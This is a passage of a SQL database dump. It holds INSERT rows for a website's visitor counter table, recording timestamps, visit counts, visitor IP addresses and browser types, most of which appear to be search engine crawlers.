9.198.26','other'),(441696,1565595899,1,1,0,0,'66.249.66.132','chrome'),(441697,1565595957,2,2,0,0,'66.249.66.220','chrome'),(441698,1565596866,2,2,0,0,'66.249.66.218','chrome'),(441699,1565596914,1,1,0,0,'141.8.188.29','other'),(441700,1565597606,1,1,0,0,'8.29.198.27','other'),(441701,1565598114,1,1,0,0,'46.211.125.24','chrome'),(441702,1565598353,1,1,0,0,'66.249.66.220','chrome'),(441703,1565598558,3,3,0,0,'66.249.66.222','chrome'),(441704,1565598688,1,1,0,0,'93.171.243.129','firefox'),(441705,1565599193,2,2,0,0,'141.8.188.29','other'),(441706,1565599208,1,1,0,0,'40.77.167.24','other'),(441707,1565600211,1,1,0,0,'66.249.66.220','chrome'),(441708,1565600874,2,2,0,0,'66.249.66.218','chrome'),(441709,1565600993,1,1,0,0,'5.45.207.8','other'),(441710,1565601388,2,2,0,0,'66.249.66.222','chrome'),(441711,1565601426,1,1,0,0,'37.57.218.190','firefox'),(441712,1565601437,2,2,0,0,'66.249.66.128','chrome'),(441713,1565601751,1,1,0,0,'66.249.66.220','chrome'),(441714,1565604719,1,1,0,0,'66.249.66.132','chrome'),(441715,1565604881,1,1,0,0,'66.249.66.220','chrome'),(441716,1565605374,1,1,0,0,'109.74.154.72','chrome'),(441717,1565606120,1,1,0,0,'66.249.66.222','chrome'),(441718,1565606286,1,1,0,0,'8.29.198.25','other'),(441719,1565606310,2,2,0,0,'66.249.66.220','chrome'),(441720,1565606380,1,1,0,0,'40.77.167.62','other'),(441721,1565606661,1,1,0,0,'185.138.228.242','chrome'),(441722,1565607327,2,2,0,0,'66.249.66.220','chrome'),(441723,1565607420,1,1,0,0,'141.8.188.11','other'),(441724,1565607617,2,2,0,0,'66.249.66.128','chrome'),(441725,1565608435,1,1,0,0,'8.29.198.25','other'),(441726,1565608843,1,1,0,0,'40.77.167.164','other'),(441727,1565608967,1,1,0,0,'37.52.47.34','chrome'),(441728,1565609015,1,1,0,0,'46.211.130.240','chrome'),(441729,1565609070,1,1,0,0,'66.249.66.130','chrome'),(441730,1565609450,1,1,0,0,'157.55.39.155','other'),(441731,1565609671,1,1,0,0,'66.249.66.222','chrome'),(441732,1565609715,1,1,0,0,'91.225.123.60','chrome'),(441733,1565610163,1,1,0,0,'193.106.30.99','chrome'),(441734,1565610454,2,2,0,0,'66.249.66.220','chrome'),(441735,1565611220,1,1,0,0,'40.77.167.177','other'),(441736,1565611381,1,1,0,0,'40.77.167.24','other'),(441737,1565611650,1,1,0,0,'141.8.188.29','other'),(441738,1565612008,1,1,0,0,'66.249.66.220','chrome'),(441739,1565612334,1,1,0,0,'46.211.111.180','chrome'),(441740,1565612969,1,1,0,0,'66.249.66.136','chrome'),(441741,1565613216,2,2,0,0,'66.249.66.220','chrome'),(441742,1565613463,1,1,0,0,'141.8.188.11','other'),(441743,1565613725,1,1,0,0,'66.249.66.132','chrome'),(441744,1565614342,1,1,0,0,'40.77.167.149','other'),(441745,1565614470,1,1,0,0,'157.55.39.70','other'),(441746,1565614480,1,1,0,0,'141.8.188.11','other'),(441747,1565614506,1,1,0,0,'141.8.188.29','other'),(441748,1565614548,1,1,0,0,'66.249.66.130','chrome'),(441749,1565614725,1,1,0,0,'5.45.207.79','other'),(441750,1565614812,1,1,0,0,'40.77.167.24','other'),(441751,1565614906,2,2,0,0,'66.249.66.222','chrome'),(441752,1565615014,1,1,0,0,'77.222.143.222','msie'),(441753,1565615459,2,2,0,0,'66.249.66.218','chrome'),(441754,1565615497,1,1,0,0,'141.8.188.11','other'),(441755,1565615580,1,1,0,0,'66.249.66.132','chrome'),(441756,1565615852,1,1,0,0,'5.45.207.19','other'),(441757,1565616373,2,2,0,0,'66.249.66.218','chrome'),(441758,1565616508,1,1,0,0,'40.77.167.164','other'),(441759,1565616716,1,1,0,0,'66.249.66.220','chrome'),(441760,1565616810,1,1,0,0,'94.100.221.234','chrome'),(441761,1565616881,1,1,0,0,'95.132.52.134','firefox'),(441762,1565616922,1,1,0,0,'40.77.167.149','other'),(441763,1565617043,1,1,0,0,'157.55.39.135','other'),(441764,1565617124,1,1,0,0,'8.29.198.25','other'),(441765,1565617146,1,1,0,0,'195.10.210.70','chrome'),(441766,1565617795,1,1,0,0,'66.249.66.222','chrome'),(441767,1565617991,1,1,0,0,'157.55.39.135','other'),(441768,1565619107,1,1,0,0,'207.46.13.96','other'),(441769,1565619125,1,1,0,0,'157.55.39.70','other'),(441770,1565619241,1,1,0,0,'46.211.101.85','chrome'),(441771,1565619267,1,1,0,0,'8.29.198.25','other'),(441772,1565619790,1,1,0,0,'207.46.13.194','other'),(441773,1565619845,3,3,0,0,'141.8.188.29','other'),(441774,1565620254,1,1,0,0,'141.8.188.11','other'),(441775,1565623783,1,1,0,0,'157.55.39.195','other'),(441776,1565624470,1,1,0,0,'66.249.66.132','chrome'),(441777,1565625557,1,1,0,0,'46.211.131.139','chrome'),(441778,1565626313,1,1,0,0,'46.211.110.81','chrome'),(441779,1565627037,1,1,0,0,'157.55.39.70','other'),(441780,1565627290,1,1,0,0,'141.8.188.29','other'),(441781,1565627386,1,1,0,0,'141.8.188.11','other'),(441782,1565627988,1,1,0,0,'8.29.198.25','other'),(441783,1565628471,1,1,0,0,'46.211.131.139','chrome'),(441784,1565629510,1,1,0,0,'91.196.178.69','chrome'),(441785,1565630102,1,1,0,0,'8.29.198.26','other'),(441786,1565630190,1,1,0,0,'141.8.188.29','other'),(441787,1565630815,3,3,0,0,'157.55.39.70','other'),(441788,1565630821,1,1,0,0,'207.46.13.83','other'),(441789,1565630825,4,4,0,0,'207.46.13.170','other'),(441790,1565631444,1,1,0,0,'91.196.178.91','firefox'),(441791,1565631760,1,1,0,0,'91.209.11.236','other'),(441792,1565632093,1,1,0,0,'176.110.134.2','chrome'),(441793,1565632436,1,1,0,0,'207.46.13.83','other'),(441794,1565632727,2,2,0,0,'207.46.13.170','other'),(441795,1565632911,1,1,0,0,'66.249.66.220','chrome'),(441796,1565633297,1,1,0,0,'5.45.207.79','other'),(441797,1565633300,1,1,0,0,'141.8.188.11','other'),(441798,1565633665,2,2,0,0,'207.46.13.148','other'),(441799,1565635197,1,1,0,0,'141.8.188.11','other'),(441800,1565635314,1,1,0,0,'157.55.39.172','other'),(441801,1565636782,1,1,0,0,'141.8.188.29','other'),(441802,1565636884,1,1,0,0,'5.45.207.79','other'),(441803,1565638199,1,1,0,0,'157.55.39.80','other'),(441804,1565638297,1,1,0,0,'141.8.188.29','other'),(441805,1565638833,1,1,0,0,'8.29.198.27','other'),(441806,1565640068,2,2,0,0,'95.213.141.126','opera'),(441807,1565640082,2,2,0,0,'66.249.66.128','chrome'),(441808,1565640907,1,1,0,0,'157.55.39.80','other'),(441809,1565640940,1,1,0,0,'8.29.198.25','other'),(441810,1565641670,2,2,0,0,'46.211.42.232','chrome'),(441811,1565642333,1,1,0,0,'157.55.39.177','other'),(441812,1565642339,1,1,0,0,'141.8.188.29','other'),(441813,1565642395,1,1,0,0,'5.45.207.79','other'),(441814,1565643349,2,2,0,0,'141.8.188.11','other'),(441815,1565643361,2,2,0,0,'157.55.39.80','other'),(441816,1565644277,1,1,0,0,'5.45.207.79','other'),(441817,1565644281,1,1,0,0,'87.250.224.65','other'),(441818,1565645133,1,1,0,0,'66.249.66.218','chrome'),(441819,1565646679,1,1,0,0,'141.8.188.29','other'),(441820,1565646740,2,2,0,0,'141.8.188.11','other'),(441821,1565647085,1,1,0,0,'157.55.39.80','other'),(441822,1565647754,2,2,0,0,'141.8.188.29','other'),(441823,1565648736,1,1,0,0,'141.8.188.11','other'),(441824,1565649676,1,1,0,0,'8.29.198.27','other'),(441825,1565649727,2,2,0,0,'157.55.39.140','other'),(441826,1565649802,3,3,0,0,'141.8.188.29','other'),(441827,1565650076,1,1,0,0,'40.77.167.46','other'),(441828,1565650774,1,1,0,0,'141.8.188.29','other'),(441829,1565650854,1,1,0,0,'66.249.66.130','chrome'),(441830,1565650968,1,1,0,0,'66.249.66.218','chrome'),(441831,1565651165,1,1,0,0,'5.45.207.19','other'),(441832,1565651427,1,1,0,0,'40.77.167.46','other'),(441833,1565651781,1,1,0,0,'8.29.198.26','other'),(441834,1565651940,1,1,0,0,'157.55.39.140','other'),(441835,1565652182,1,1,0,0,'141.8.142.103','other'),(441836,1565652185,1,1,0,0,'157.55.39.60','other'),(441837,1565652468,1,1,0,0,'66.249.66.220','chrome'),(441838,1565652520,1,1,0,0,'141.8.188.29','other'),(441839,1565653125,1,1,0,0,'46.118.152.141','chrome'),(441840,1565653531,1,1,0,0,'40.77.167.46','other'),(441841,1565655136,1,1,0,0,'157.55.39.140','other'),(441842,1565655164,2,2,0,0,'207.46.13.171','other'),(441843,1565656855,2,2,0,0,'207.46.13.171','other'),(441844,1565657585,1,1,0,0,'66.249.136.47','other'),(441845,1565658776,1,1,0,0,'157.55.39.78','other'),(441846,1565659663,3,3,0,0,'207.46.13.171','other'),(441847,1565659923,1,1,0,0,'193.106.30.99','chrome'),(441848,1565659969,1,1,0,0,'157.55.39.78','other'),(441849,1565659984,1,1,0,0,'66.249.66.68','chrome'),(441850,1565660525,1,1,0,0,'8.29.198.27','other'),(441851,1565662432,1,1,0,0,'157.55.39.78','other'),(441852,1565662620,1,1,0,0,'8.29.198.27','other'),(441853,1565663716,1,1,0,0,'157.55.39.78','other'),(441854,1565664469,1,1,0,0,'40.77.167.142','other'),(441855,1565664760,1,1,0,0,'207.46.13.171','other'),(441856,1565666904,1,1,0,0,'66.249.66.82','chrome'),(441857,1565667757,216,216,0,0,'162.210.196.100','other'),(441858,1565668359,1,1,0,0,'66.249.66.64','chrome'),(441859,1565668385,1,1,0,0,'40.77.167.142','other'),(441860,1565668424,1,1,0,0,'66.249.66.82','chrome'),(441861,1565670288,1,1,0,0,'157.55.39.78','other'),(441862,1565670595,1,1,0,0,'66.249.66.81','chrome'),(441863,1565670757,1,1,0,0,'91.196.178.133','firefox'),(441864,1565671373,1,1,0,0,'8.29.198.27','other'),(441865,1565672209,1,1,0,0,'66.249.66.81','chrome'),(441866,1565672856,1,1,0,0,'13.66.139.0','other'),(441867,1565672982,1,1,0,0,'40.77.167.21','other'),(441868,1565673201,1,1,0,0,'40.77.167.165','other'),(441869,1565673454,1,1,0,0,'8.29.198.26','other'),(441870,1565674882,2,2,0,0,'157.55.39.157','other'),(441871,1565674885,2,2,0,0,'40.77.167.21','other'),(441872,1565675264,3,3,0,0,'91.196.177.42','chrome'),(441873,1565675560,1,1,0,0,'109.70.100.22','other'),(441874,1565675819,1,1,0,0,'173.212.233.72','chrome'),(441875,1565677128,1,1,0,0,'91.196.177.46','chrome'),(441876,1565677574,1,1,0,0,'94.100.221.234','chrome'),(441877,1565678367,1,1,0,0,'157.55.39.78','other'),(441878,1565678979,1,1,0,0,'66.249.66.132','chrome'),(441879,1565679169,2,2,0,0,'40.77.167.165','other'),(441880,1565679884,1,1,0,0,'46.211.73.114','chrome'),(441881,1565680925,1,1,0,0,'207.46.13.120','other'),(441882,1565681301,1,1,0,0,'66.249.66.222','chrome'),(441883,1565682227,1,1,0,0,'8.29.198.25','other'),(441884,1565682505,1,1,0,0,'91.196.178.189','chrome'),(441885,1565683486,1,1,0,0,'93.171.245.17','chrome'),(441886,1565683856,1,1,0,0,'13.66.139.0','other'),(441887,1565684260,1,1,0,0,'130.180.216.179','chrome'),(441888,1565684302,1,1,0,0,'8.29.198.25','other'),(441889,1565684847,1,1,0,0,'157.55.39.78','other'),(441890,1565684907,1,1,0,0,'40.77.167.165','other'),(441891,1565685196,3,3,0,0,'141.8.188.11','other'),(441892,1565685788,1,1,0,0,'195.10.210.70','chrome'),(441893,1565686267,1,1,0,0,'157.55.39.109','other'),(441894,1565686369,1,1,0,0,'141.8.188.29','other'),(441895,1565686789,1,1,0,0,'193.106.30.99','chrome'),(441896,1565687114,2,2,0,0,'37.55.88.19','chrome'),(441897,1565687506,2,2,0,0,'157.55.39.109','other'),(441898,1565687648,1,1,0,0,'5.45.207.79','other'),(441899,1565687938,2,2,0,0,'157.55.39.78','other'),(441900,1565688025,2,2,0,0,'207.46.13.120','other'),(441901,1565688710,1,1,0,0,'91.196.178.78','firefox'),(441902,1565689160,1,1,0,0,'157.55.39.109','other'),(441903,1565689299,1,1,0,0,'207.46.13.101','other'),(441904,1565689561,1,1,0,0,'40.77.167.148','other'),(441905,1565690731,2,2,0,0,'207.46.13.101','other'),(441906,1565690779,1,1,0,0,'94.100.221.234','chrome'),(441907,1565690998,2,2,0,0,'40.77.167.72','other'),(441908,1565691607,1,1,0,0,'213.180.203.9','other'),(441909,1565691679,1,1,0,0,'207.46.13.120','other'),(441910,1565691767,1,1,0,0,'180.76.15.140','other'),(441911,1565691936,1,1,0,0,'109.74.154.72','chrome'),(441912,1565691981,4,4,0,0,'141.8.188.29','other'),(441913,1565692960,2,2,0,0,'40.77.167.72','other'),(441914,1565693085,1,1,0,0,'8.29.198.25','other'),(441915,1565693293,3,3,0,0,'207.46.13.120','other'),(441916,1565693344,1,1,0,0,'207.46.13.109','other'),(441917,1565693350,1,1,0,0,'141.8.188.29','other'),(441918,1565693504,2,2,0,0,'207.46.13.101','other'),(441919,1565694457,1,1,0,0,'5.62.19.43','chrome'),(441920,1565694670,1,1,0,0,'66.249.66.220','chrome'),(441921,1565694967,1,1,0,0,'31.43.13.122','chrome'),(441922,1565695140,1,1,0,0,'141.8.188.29','other'),(441923,1565695150,1,1,0,0,'8.29.198.26','other'),(441924,1565695311,1,1,0,0,'207.46.13.101','other'),(441925,1565695567,2,2,0,0,'207.46.13.109','other'),(441926,1565695817,1,1,0,0,'5.45.207.19','other'),(441927,1565696816,2,2,0,0,'40.77.167.72','other'),(441928,1565697383,1,1,0,0,'176.36.241.190','firefox'),(441929,1565698396,2,2,0,0,'141.8.188.29','other'),(441930,1565698540,1,1,0,0,'207.46.13.120','other'),(441931,1565698739,2,2,0,0,'40.77.167.50','other'),(441932,1565699424,1,1,0,0,'91.196.159.42','chrome'),(441933,1565699588,1,1,0,0,'141.101.134.52','chrome'),(441934,1565699776,1,1,0,0,'40.77.167.72','other'),(441935,1565700175,1,1,0,0,'176.111.33.18','firefox'),(441936,1565700245,1,1,0,0,'207.46.13.225','other'),(441937,1565700251,1,1,0,0,'40.77.167.50','other'),(441938,1565700540,1,1,0,0,'91.124.182.170','firefox'),(441939,1565700543,3,3,0,0,'207.46.13.109','other'),(441940,1565700846,1,1,0,0,'66.249.66.222','chrome'),(441941,1565700977,1,1,0,0,'46.211.134.47','chrome'),(441942,1565701158,1,1,0,0,'91.196.177.20','chrome'),(441943,1565701428,2,2,0,0,'40.77.167.50','other'),(441944,1565701451,1,1,0,0,'91.124.182.170','firefox'),(441945,1565701620,1,1,0,0,'141.8.188.29','other'),(441946,1565702104,1,1,0,0,'40.77.167.72','other'),(441947,1565702308,1,1,0,0,'207.46.13.109','other'),(441948,1565702731,1,1,0,0,'13.66.139.0','other'),(441949,1565702879,2,2,0,0,'176.9.25.107','other'),(441950,1565702989,2,2,0,0,'207.46.13.225','other'),(441951,1565703065,1,1,0,0,'141.8.188.29','other'),(441952,1565703212,4,4,0,0,'207.46.13.109','other'),(441953,1565703384,1,1,0,0,'40.77.167.72','other'),(441954,1565703682,2,2,0,0,'40.77.167.50','other'),(441955,1565703871,1,1,0,0,'178.154.200.48','other'),(441956,1565703931,1,1,0,0,'95.108.181.54','other'),(441957,1565703938,1,1,0,0,'8.29.198.25','other'),(441958,1565703964,1,1,0,0,'207.46.13.225','other'),(441959,1565704222,1,1,0,0,'91.124.182.170','firefox'),(441960,1565704531,1,1,0,0,'207.46.13.109','other'),(441961,1565705151,1,1,0,0,'207.46.13.225','other'),(441962,1565705306,1,1,0,0,'141.8.188.11','other'),(441963,1565705451,1,1,0,0,'141.8.188.29','other'),(441964,1565705453,2,2,0,0,'157.55.39.105','other'),(441965,1565705555,1,1,0,0,'207.46.13.109','other'),(441966,1565705998,1,1,0,0,'8.29.198.27','other'),(441967,1565706137,1,1,0,0,'77.222.143.222','msie'),(441968,1565706387,1,1,0,0,'66.249.66.220','chrome'),(441969,1565706592,2,2,0,0,'157.55.39.105','other'),(441970,1565706597,1,1,0,0,'40.77.167.50','other'),(441971,1565706859,1,1,0,0,'141.8.188.29','other'),(441972,1565707091,2,2,0,0,'207.46.13.109','other'),(441973,1565707612,1,1,0,0,'40.77.167.50','other'),(441974,1565707615,1,1,0,0,'178.95.111.127','other'),(441975,1565707811,1,1,0,0,'157.55.39.105','other'),(441976,1565707830,3,3,0,0,'207.46.13.225','other'),(441977,1565707866,1,1,0,0,'141.8.188.29','other'),(441978,1565709267,1,1,0,0,'207.46.13.109','other'),(441979,1565709832,1,1,0,0,'91.196.178.27','chrome'),(441980,1565710093,1,1,0,0,'157.55.39.105','other'),(441981,1565710201,3,3,0,0,'207.46.13.225','other'),(441982,1565710338,1,1,0,0,'141.8.188.29','other'),(441983,1565710854,2,2,0,0,'40.77.167.50','other'),(441984,1565710885,2,2,0,0,'207.46.13.109','other'),(441985,1565711664,3,3,0,0,'207.46.13.225','other'),(441986,1565711931,2,2,0,0,'207.46.13.109','other'),(441987,1565712878,1,1,0,0,'207.46.13.109','other'),(441988,1565713075,1,1,0,0,'40.77.167.50','other'),(441989,1565713079,1,1,0,0,'207.46.13.225','other'),(441990,1565713504,1,1,0,0,'193.106.30.99','chrome'),(441991,1565713704,2,2,0,0,'207.46.13.219','other'),(441992,1565714516,2,2,0,0,'207.46.13.109','other'),(441993,1565714778,1,1,0,0,'8.29.198.27','other'),(441994,1565714804,1,1,0,0,'157.55.39.105','other'),(441995,1565716251,1,1,0,0,'207.46.13.225','other'),(441996,1565716614,1,1,0,0,'141.8.188.29','other'),(441997,1565716834,1,1,0,0,'8.29.198.27','other'),(441998,1565717057,1,1,0,0,'95.135.0.40','chrome'),(441999,1565717647,1,1,0,0,'207.46.13.225','other'),(442000,1565717702,1,1,0,0,'91.196.178.90','firefox'),(442001,1565718028,1,1,0,0,'141.8.188.29','other'),(442002,1565718456,3,3,0,0,'157.55.39.105','other'),(442003,1565719124,1,1,0,0,'141.8.188.29','other'),(442004,1565719499,2,2,0,0,'157.55.39.105','other'),(442005,1565720462,2,2,0,0,'157.55.39.105','other'),(442006,1565720635,2,2,0,0,'40.77.167.136','other'),(442007,1565721002,1,1,0,0,'77.222.143.222','msie'),(442008,1565721014,2,2,0,0,'207.46.13.193','other'),(442009,1565721482,3,3,0,0,'40.77.167.16','other'),(442010,1565721899,1,1,0,0,'207.46.13.223','other'),(442011,1565722510,3,3,0,0,'157.55.39.105','other'),(442012,1565723220,3,3,0,0,'95.216.9.239','other'),(442013,1565723721,1,1,0,0,'141.8.188.29','other'),(442014,1565724107,1,1,0,0,'87.250.224.65','other'),(442015,1565724151,2,2,0,0,'157.55.39.105','other'),(442016,1565724189,1,1,0,0,'40.77.167.16','other'),(442017,1565724220,2,2,0,0,'207.46.13.223','other'),(442018,1565724309,1,1,0,0,'207.46.13.193','other'),(442019,1565725084,2,2,0,0,'157.55.39.105','other'),(442020,1565725149,1,1,0,0,'207.46.13.223','other'),(442021,1565725308,1,1,0,0,'95.108.181.54','other'),(442022,1565725623,1,1,0,0,'8.29.198.26','other'),(442023,1565725717,2,2,0,0,'40.77.167.16','other'),(442024,1565725957,1,1,0,0,'66.249.66.218','chrome'),(442025,1565726062,1,1,0,0,'157.55.39.105','other'),(442026,1565726316,2,2,0,0,'66.249.66.220','chrome'),(442027,1565726332,2,2,0,0,'207.46.13.193','other'),(442028,1565726584,2,2,0,0,'207.46.13.223','other'),(442029,1565726781,4,4,0,0,'40.77.167.16','other'),(442030,1565727074,1,1,0,0,'87.250.224.64','other'),(442031,1565727361,2,2,0,0,'157.55.39.105','other'),(442032,1565727677,1,1,0,0,'8.29.198.27','other'),(442033,1565728053,2,2,0,0,'207.46.13.223','other'),(442034,1565728836,1,1,0,0,'157.55.39.105','other'),(442035,1565729126,2,2,0,0,'40.77.167.16','other'),(442036,1565729219,1,1,0,0,'95.108.181.54','other'),(442037,1565729367,2,2,0,0,'207.46.13.223','other'),(442038,1565730084,2,2,0,0,'207.46.13.193','other'),(442039,1565730226,1,1,0,0,'5.45.207.19','other'),(442040,1565730537,2,2,0,0,'157.55.39.60','other'),(442041,1565730884,1,1,0,0,'141.8.142.103','other'),(442042,1565731171,2,2,0,0,'40.77.167.16','other'),(442043,1565731192,1,1,0,0,'207.46.13.193','other'),(442044,1565731458,1,1,0,0,'157.55.39.162','other'),(442045,1565731569,3,3,0,0,'207.46.13.223','other'),(442046,1565731741,1,1,0,0,'37.9.113.20','other'),(442047,1565732181,1,1,0,0,'207.46.13.193','other'),(442048,1565732472,1,1,0,0,'207.46.13.223','other'),(442049,1565733216,3,3,0,0,'207.46.13.138','other'),(442050,1565733367,2,2,0,0,'40.77.167.16','other'),(442051,1565733526,1,1,0,0,'13.66.139.0','other'),(442052,1565734404,1,1,0,0,'106.52.185.232','other'),(442053,1565734756,1,1,0,0,'178.154.200.48','other'),(442054,1565735177,2,2,0,0,'207.46.13.138','other');
INSERT INTO `fw3gt_zt_visitor_counter` VALUES (442055,1565735623,1,1,0,0,'178.154.171.24','other'),(442056,1565735780,1,1,0,0,'207.46.13.193','other'),(442057,1565735885,2,2,0,0,'40.77.167.76','other'),(442058,1565736150,1,1,0,0,'91.196.178.39','chrome'),(442059,1565736206,1,1,0,0,'207.46.13.223','other'),(442060,1565736465,1,1,0,0,'8.29.198.26','other'),(442061,1565736697,1,1,0,0,'207.46.13.193','other'),(442062,1565737450,2,2,0,0,'207.46.13.143','other'),(442063,1565737472,1,1,0,0,'141.8.142.103','other'),(442064,1565737492,1,1,0,0,'207.46.13.138','other'),(442065,1565737779,1,1,0,0,'37.9.113.20','other'),(442066,1565737845,1,1,0,0,'207.46.13.223','other'),(442067,1565738531,1,1,0,0,'8.29.198.25','other'),(442068,1565738598,1,1,0,0,'207.46.13.143','other'),(442069,1565738695,2,2,0,0,'207.46.13.193','other'),(442070,1565738800,3,3,0,0,'207.46.13.138','other'),(442071,1565738969,1,1,0,0,'207.46.13.223','other'),(442072,1565739288,1,1,0,0,'66.249.66.218','chrome'),(442073,1565739597,1,1,0,0,'5.9.152.73','other'),(442074,1565739806,1,1,0,0,'193.106.30.99','chrome'),(442075,1565739899,1,1,0,0,'207.46.13.223','other'),(442076,1565739937,1,1,0,0,'213.180.203.53','other'),(442077,1565740626,1,1,0,0,'178.154.171.27','other'),(442078,1565741032,1,1,0,0,'207.46.13.138','other'),(442079,1565741045,1,1,0,0,'207.46.13.223','other'),(442080,1565741561,1,1,0,0,'95.108.181.83','other'),(442081,1565741672,2,2,0,0,'207.46.13.193','other'),(442082,1565741960,2,2,0,0,'207.46.13.223','other'),(442083,1565743144,2,2,0,0,'207.46.13.138','other'),(442084,1565743514,4,4,0,0,'207.46.13.193','other'),(442085,1565743655,3,3,0,0,'207.46.13.223','other'),(442086,1565743812,2,2,0,0,'207.46.13.143','other'),(442087,1565744093,1,1,0,0,'66.249.66.220','chrome'),(442088,1565744148,1,1,0,0,'207.46.13.138','other'),(442089,1565744401,1,1,0,0,'38.145.106.215','other'),(442090,1565745782,1,1,0,0,'207.46.13.193','other'),(442091,1565746234,1,1,0,0,'207.46.13.138','other'),(442092,1565746731,1,1,0,0,'207.46.13.143','other'),(442093,1565747319,1,1,0,0,'8.29.198.26','other'),(442094,1565747330,1,1,0,0,'141.8.188.11','other'),(442095,1565748479,3,3,0,0,'207.46.13.195','other'),(442096,1565748493,1,1,0,0,'207.46.13.138','other'),(442097,1565748647,1,1,0,0,'207.46.13.143','other'),(442098,1565748778,2,2,0,0,'207.46.13.36','other'),(442099,1565749141,1,1,0,0,'34.204.194.34','other'),(442100,1565749381,1,1,0,0,'8.29.198.27','other'),(442101,1565749751,1,1,0,0,'207.46.13.143','other'),(442102,1565750185,1,1,0,0,'207.46.13.138','other'),(442103,1565750911,1,1,0,0,'207.46.13.195','other'),(442104,1565751136,3,3,0,0,'207.46.13.143','other'),(442105,1565751672,2,2,0,0,'141.8.188.29','other'),(442106,1565752035,1,1,0,0,'13.66.139.0','other'),(442107,1565752235,1,1,0,0,'128.72.159.196','msie'),(442108,1565752279,1,1,0,0,'5.45.207.79','other'),(442109,1565752914,1,1,0,0,'207.46.13.138','other'),(442110,1565753077,1,1,0,0,'141.8.188.29','other'),(442111,1565753283,3,3,0,0,'207.46.13.36','other'),(442112,1565753372,1,1,0,0,'207.46.13.143','other'),(442113,1565753498,1,1,0,0,'141.8.188.11','other'),(442114,1565753501,1,1,0,0,'207.46.13.195','other'),(442115,1565753744,1,1,0,0,'5.255.253.38','other'),(442116,1565753927,1,1,0,0,'207.46.13.138','other'),(442117,1565753956,1,1,0,0,'51.68.152.26','chrome'),(442118,1565755082,1,1,0,0,'141.8.188.29','other'),(442119,1565755326,1,1,0,0,'207.46.13.143','other'),(442120,1565755536,1,1,0,0,'207.46.13.36','other'),(442121,1565756566,1,1,0,0,'207.46.13.195','other'),(442122,1565756647,2,2,0,0,'207.46.13.36','other'),(442123,1565756722,1,1,0,0,'180.76.15.32','other'),(442124,1565757089,1,1,0,0,'91.196.178.135','firefox'),(442125,1565757612,1,1,0,0,'141.8.188.29','other'),(442126,1565757792,3,3,0,0,'207.46.13.195','other'),(442127,1565757793,1,1,0,0,'207.46.13.36','other'),(442128,1565757890,2,2,0,0,'207.46.13.143','other'),(442129,1565757943,1,1,0,0,'40.77.167.147','other'),(442130,1565758170,1,1,0,0,'8.29.198.25','other'),(442131,1565758659,1,1,0,0,'141.8.188.11','other'),(442132,1565759583,4,4,0,0,'141.8.188.29','other'),(442133,1565759808,1,1,0,0,'207.46.13.143','other'),(442134,1565760229,1,1,0,0,'8.29.198.25','other'),(442135,1565760656,1,1,0,0,'141.8.188.29','other'),(442136,1565761160,1,1,0,0,'89.234.157.254','other'),(442137,1565762293,1,1,0,0,'141.8.188.11','other'),(442138,1565762657,2,2,0,0,'94.153.229.229','chrome'),(442139,1565762769,1,1,0,0,'141.8.188.29','other'),(442140,1565763310,1,1,0,0,'77.222.143.222','msie'),(442141,1565763427,1,1,0,0,'157.55.39.136','other'),(442142,1565763428,1,1,0,0,'176.111.33.18','firefox'),(442143,1565763747,1,1,0,0,'207.46.13.216','other'),(442144,1565763749,1,1,0,0,'91.196.177.20','chrome'),(442145,1565763790,2,2,0,0,'141.8.188.29','other'),(442146,1565764545,1,1,0,0,'157.55.39.136','other'),(442147,1565766475,1,1,0,0,'91.196.178.87','chrome'),(442148,1565766967,1,1,0,0,'207.46.13.86','other'),(442149,1565766978,1,1,0,0,'141.8.188.65','other'),(442150,1565767530,1,1,0,0,'207.46.13.214','other'),(442151,1565767729,1,1,0,0,'91.196.178.9','chrome'),(442152,1565769012,1,1,0,0,'8.29.198.25','other'),(442153,1565769146,1,1,0,0,'207.46.13.221','other'),(442154,1565769344,1,1,0,0,'209.17.96.114','other'),(442155,1565771123,1,1,0,0,'8.29.198.27','other'),(442156,1565771303,1,1,0,0,'207.46.13.221','other'),(442157,1565773608,1,1,0,0,'207.46.13.221','other'),(442158,1565773845,1,1,0,0,'207.46.13.216','other'),(442159,1565774029,1,1,0,0,'91.209.11.236','other'),(442160,1565774231,1,1,0,0,'46.42.128.253','msie'),(442161,1565774311,1,1,0,0,'40.77.167.118','other'),(442162,1565775143,2,2,0,0,'94.100.221.234','chrome'),(442163,1565775762,2,2,0,0,'207.46.13.216','other'),(442164,1565775862,1,1,0,0,'207.46.13.7','other'),(442165,1565776010,1,1,0,0,'66.249.66.218','chrome'),(442166,1565776753,1,1,0,0,'91.209.11.236','other'),(442167,1565776934,1,1,0,0,'66.249.66.220','chrome'),(442168,1565777052,1,1,0,0,'207.46.13.216','other'),(442169,1565777121,1,1,0,0,'66.249.66.222','chrome'),(442170,1565777452,1,1,0,0,'91.196.178.102','chrome'),(442171,1565778190,1,1,0,0,'109.74.154.72','chrome'),(442172,1565778212,1,1,0,0,'207.46.13.216','other'),(442173,1565778317,1,1,0,0,'157.55.39.104','other'),(442174,1565779201,1,1,0,0,'141.8.142.108','other'),(442175,1565779214,1,1,0,0,'66.249.66.130','chrome'),(442176,1565779224,1,0,1,0,'66.249.66.128',''),(442177,1565779238,2,2,0,0,'95.213.141.126','opera'),(442178,1565779419,1,1,0,0,'207.46.13.250','other'),(442179,1565779884,1,1,0,0,'8.29.198.26','other'),(442180,1565779989,1,1,0,0,'157.55.39.104','other'),(442181,1565780734,1,1,0,0,'37.73.139.190','chrome'),(442182,1565780990,1,1,0,0,'157.55.39.104','other'),(442183,1565781544,1,1,0,0,'93.72.232.196','chrome'),(442184,1565781912,1,1,0,0,'207.46.13.250','other'),(442185,1565781977,1,1,0,0,'8.29.198.25','other'),(442186,1565782551,1,1,0,0,'180.76.15.5','other'),(442187,1565782994,1,1,0,0,'85.115.62.180','other'),(442188,1565783327,1,1,0,0,'207.46.13.199','other'),(442189,1565784097,1,1,0,0,'37.9.113.148','other'),(442190,1565784212,1,1,0,0,'91.124.182.170','firefox'),(442191,1565784265,1,1,0,0,'157.55.39.156','other'),(442192,1565784766,1,1,0,0,'159.224.241.117','chrome'),(442193,1565785169,1,1,0,0,'37.9.113.148','other'),(442194,1565786355,1,1,0,0,'66.249.66.218','chrome'),(442195,1565786366,1,1,0,0,'193.93.78.39','chrome'),(442196,1565786726,2,2,0,0,'66.249.66.220','chrome'),(442197,1565787597,2,2,0,0,'157.55.39.156','other'),(442198,1565787610,1,1,0,0,'141.8.188.49','other'),(442199,1565787874,1,1,0,0,'207.46.13.250','other'),(442200,1565787920,1,1,0,0,'157.55.39.111','other'),(442201,1565788060,1,1,0,0,'91.196.178.25','chrome'),(442202,1565788702,1,1,0,0,'141.8.188.